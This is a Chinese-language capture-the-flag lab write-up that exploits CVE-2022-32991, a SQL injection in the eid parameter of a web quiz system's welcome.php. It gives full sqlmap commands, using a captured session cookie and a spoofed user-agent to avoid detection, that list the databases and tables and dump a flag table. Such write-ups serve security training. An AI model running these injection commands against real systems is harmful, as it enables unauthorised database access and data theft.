【春秋云境】CVE-2022-32991靶场WP
网站地址:https://yunjing.ichunqiu.com/
渗透测试
1.已知提示
- 该CMS的welcome.php中存在SQL注入攻击
2.开启靶场
3.注册账户
- 点击REGISTER随意填写信息,注册一个账户
4.登录账户
- 用刚注册好的账户登录
5.成功进入主页
6.查找注入点
-
CVE官方提示:在welcome.php,发现基于 Web 的测验系统 v1.0 通过 eid 参数包含一个 SQL 注入漏洞,所以我们要找到存在eid参数的功能界面
-
点击start发现跳转的页面存在eid参数
7.开启Burpsuite抓包
-
使用bp抓包,并记录下需要的参数。由于该页面采用了登录访问,使用cookie参数可以绕过身份验证,添加–user-agent参数可以绕过客户端验证,否则可能会被识别到明显的sqlmap客户端标识,从而导致攻击的中断
参数名 参数值 user-agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36 cookie Cookie: PHPSESSID=dbe9kekm9o115dnbm1uainp90e
8.sqlmap攻击
-
爆库
python3 sqlmap.py -u "http://eci-2zebqohp4pc197930s3g.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36" --cookie="PHPSESSID=dbe9kekm9o115dnbm1uainp90e" --batch --dbs
-
爆表
python3 sqlmap.py -u "http://eci-2zebqohp4pc197930s3g.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36" --cookie="PHPSESSID=dbe9kekm9o115dnbm1uainp90e" --batch -D "ctf" --tables
-
爆字段
python3 sqlmap.py -u "http://eci-2zebqohp4pc197930s3g.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36" --cookie="PHPSESSID=dbe9kekm9o115dnbm1uainp90e" --batch -D "ctf" -T "flag" --dump